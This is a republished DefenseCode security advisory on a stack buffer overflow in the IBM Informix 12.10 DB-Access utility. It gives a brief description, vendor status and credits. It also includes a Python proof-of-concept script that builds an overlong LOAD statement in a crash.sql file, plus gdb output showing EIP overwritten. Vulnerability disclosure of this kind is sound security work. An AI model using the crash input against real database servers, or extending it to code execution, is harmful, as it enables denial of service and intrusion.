首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IBM Informix 12.10 DB-Access Buffer Overflow
来源:http://www.defensecode.com 作者:DefenseCode 发布时间:2017-07-12  
          DefenseCode Security Advisory
      IBM Informix DB-Access Buffer Overflow


Advisory ID: DC-2017-04-001
Advisory Title: IBM Informix DB-Access Buffer Overflow
Advisory URL:
http://www.defensecode.com/advisories/DC-2017-04-001_IBM_Informix_DB-Access_Buffer_Overflow.pdf
Software: IBM Informix
Version: 12.10
Vendor Status: Vendor Contacted / Not Fixed
Release Date: 11.07.2017
Risk: High



1. General Overview
===================
IBM Informix DB-Access utility is vulnerable to a stack based buffer
overflow,
caused by improper bounds checking which could allow an attacker to execute
arbitrary code. The vulnerability is triggered by providing an overly long
file parameter value inside a LOAD statement, which is used to insert data
from an operating-system file into an existing table or view.


2. Software Overview
===================
Informix is one of the worldas most widely used database servers with users
ranging from the worldas largest corporations to start-ups. IBM Informix
incorporates design concepts that are significantly different from
traditional
relational platforms, resulting in extremely high levels of performance and
availability, distinctive capabilities in data replication and
scalability, and
minimal administrative overhead.

The DB-Access utility is included with the Informix server and with the
Informix
Client Software Development Kit. DB-Access provides a menu-driven
interface for
entering, running, and debugging SQL statements and Stored Procedure
Language
routines. DB-Access can also be ran interactively from the command line.


3. Brief Vulnerability Description
==================================
By providing a specially crafted command file to the DB-Access command line
utility it is possible to cause a buffer overflow, overwriting the
instruction
pointer (EIP) and thus hijack the execution flow of the program. Crafted
file
contains a LOAD statement with an overly long file parameter that will
overwrite EIP.

3.1 Proof of Concept

The following python script will generate a proof of concept .sql crash
test
file that can be used to verify the vulnerability:

-------
#!/usr/bin/python

load_overflow = 'A' * 5000
statement = "LOAD FROM '" + load_overflow + " test' INSERT INTO example;"

crash_file = open("crash.sql", "w")
crash_file.write(statement)
crash_file.close()
-------

PoC usage: dbaccess <name of existing database> crash.sql

-------
Registers state following the overflow:

(gdb) i r
eax            0xffffffff    -1
ecx            0xb7bf4d00    -1212199680
edx            0x0    0
ebx            0x41414141    1094795585
esp            0xbfffce40    0xbfffce40
ebp            0x41414141    0x41414141
esi            0x41414141    1094795585
edi            0x41414141    1094795585
eip            0x41414141    0x41414141
-------

PoC tested on: Informix Innovator-C Edition for Linux x86 32


4. Solution
==========
The vulnerability has not been addressed by vendor in a 90 days period
following the submission. Vendor has expressed an intention of fixing the
vulnerability in a future update.


5. Credits
==========
Vulnerability discovered by Leon Juranic, further analysis by Bosko
Stankovic.



6. About DefenseCode
================================
DefenseCode L.L.C. delivers products and services designed to analyze
and test
web, desktop and mobile applications for security vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security Testing,
WhiteBox
Testing) solution for performing extensive security audits of
application source
code. ThunderScan performs fast and accurate analyses of large and complex
source code projects delivering precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security Testing,
BlackBox
Testing) solution for comprehensive security audits of active web
applications.
WebScanner will test a website's security by carrying out a large number of
attacks using the most advanced techniques, just as a real attacker would.

Subscribe for free software trial on our website http://www.defensecode.com/

E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows Windows 7/8.
·RaidenHTTPD 2.0.44 User-Agent
·WMI Event Subscription Persist
·Skype for Business 2016 - Cros
·DNS/DNSSEC RR Stub Resolver De
·PyCharm 2-0 / 2017 Buffer Over
·Easy File Sharing Web Server 7
·Apache Struts 2.3.x Showcase -
·Yaws 1.91 - Remote File Disclo
·Counter Strike: Condition Zero
·Firefox 54.0.1 - Denial of Ser
·Firefox 50.0.1 - ASM.JS JIT-Sp
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved